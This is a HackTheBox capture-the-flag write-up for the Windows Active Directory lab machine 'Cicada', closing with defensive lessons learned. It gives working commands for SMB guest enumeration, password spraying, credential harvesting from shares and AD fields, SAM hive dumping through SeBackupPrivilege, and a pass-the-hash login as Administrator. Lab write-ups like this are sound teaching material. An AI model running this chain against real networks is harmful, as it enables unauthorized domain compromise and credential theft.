Home » Posts » Cicada Writeup

Cicada Writeup

0x5t
0x5t avatar
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Posted:  |  Tags: HackTheBox, Windows, Active Directory, SMB

Synopsis

Cicada is an easy Active Directory Windows machine that demonstrates a classic domain compromise chain: enumerating exposed SMB shares, retrieving default credentials from onboarding documentation, enumerating domain users, performing a password spray, collecting additional plaintext credentials from Active Directory user attributes and scripts in shared folders, and finally abusing the SeBackupPrivilege to dump and crack NTLM hashes, enabling a Pass-the-Hash attack to gain full administrative access.

Pre-Reqs

  • Access to HackTheBox network
  • Common penetration testing tools:
  • nmap
  • crackmapexec
  • impacket suite
  • smbclient
  • evil-winrm
  • Familiarity with Active Directory concepts

Skills Required

  • Windows enumeration
  • SMB share navigation
  • Active Directory enumeration
  • Basic password spraying methodology

Skills Learned

  • Identifying and abusing weak share permissions
  • Extracting credentials from files and AD description fields
  • Performing low-noise password sprays
  • Abusing SeBackupPrivilege to extract registry hives
  • Using NTLM hashes for Pass-the-Hash authentication

Enumeration

Nmap Scan

Ports discovered:

53/tcp   domain
88/tcp   kerberos-sec
135/tcp  msrpc
139/tcp  netbios-ssn
389/tcp  ldap
445/tcp  microsoft-ds
464/tcp  kpasswd5
593/tcp  ncacn\_http
636/tcp  ssl/ldap
3268/tcp ldap
3269/tcp ssl/ldap

Nmap Command

nmap -sC -sV -Pn 10.10.10.10

The results reveal a Windows Server 2022 Domain Controller named CICADA-DC within the cicada.htb domain. Multiple LDAP and Kerberos ports confirm this is an Active Directory environment.

echo "10.10.10.10 cicada.htb" | sudo tee -a /etc/hosts

This maps the domain name to the target IP for tools that require domain context.

SMB Enumeration

Check for anonymous share access:

crackmapexec smb cicada.htb --shares

No shares are accessible anonymously. Try the built-in guest account with a blank password:

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

Output shows that the HR share is readable by guest.

Access the share:

smbclient //cicada.htb/HR

List files:

smb: \> dir
Notice from HR.txt

Download and read Notice from HR.txt:

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

A default password for new hires is now available for testing.

Foothold

Enumerating Domain Users

Use lookupsid to enumerate usernames from the domain:

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt

Example entries:

Administrator
Guest
krbtgt
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Password Spraying

Test the default password against all enumerated accounts:

crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Result:

cicada.htb\michael.wrightson : Cicada$M6Corpb*@Lp#nZp!8

We have valid credentials for michael.wrightson.

Lateral Movement

Enumerating with Michael's Account

List all users and check AD description fields:

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

Discovered david.orelious has this password in his description:

aRt$Lp#7t*VQ!3

Accessing DEV Share with David's Credentials

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'

List contents:

Backup_script.ps1

Download and read the script. It contains hardcoded credentials for another user:

emily.oscars : Q!3@Lp#M6b*7t*Vt

WinRM Access as Emily

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb

This provides a shell as Emily. Retrieve the user.txt flag from her desktop.

Privilege Escalation

Checking Privileges

whoami /priv

Emily has:

SeBackupPrivilege    Enabled
SeRestorePrivilege   Enabled

SeBackupPrivilege allows bypassing file ACLs for reading system-protected files such as the SAM and SYSTEM registry hives.

Dumping Registry Hives

reg save hklm\sam sam
reg save hklm\system system

Download both:

download sam
download system

Extracting NTLM Hashes

impacket-secretsdump -sam sam -system system local

Administrator NTLM hash found:

2b87e7c93a3e8a0ea4a581937016f341

Pass-the-Hash to Administrator

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

We now have a shell as Administrator.

Root Flag

cat C:\Users\Administrator\Desktop\root.txt

The root flag is retrieved successfully.

Summary

  1. Enumerated SMB shares as guest and found default password in HR share.
  2. Enumerated domain users with lookupsid.
  3. Password sprayed default credential; obtained access as michael.wrightson.
  4. Found david.orelious credentials in AD description field.
  5. Accessed DEV share; discovered emily.oscars credentials in a backup script.
  6. Logged in as Emily via WinRM.
  7. Used SeBackupPrivilege to dump SAM and SYSTEM hives.
  8. Extracted Administrator NTLM hash and performed Pass-the-Hash for full control.

Lessons Learned:

  • Weak share permissions can leak sensitive information.
  • Default credentials remain a major vulnerability.
  • AD description fields should never contain passwords.
  • SeBackupPrivilege is dangerous when assigned to non-admin accounts.

Additional Resources

Back to Posts
Contents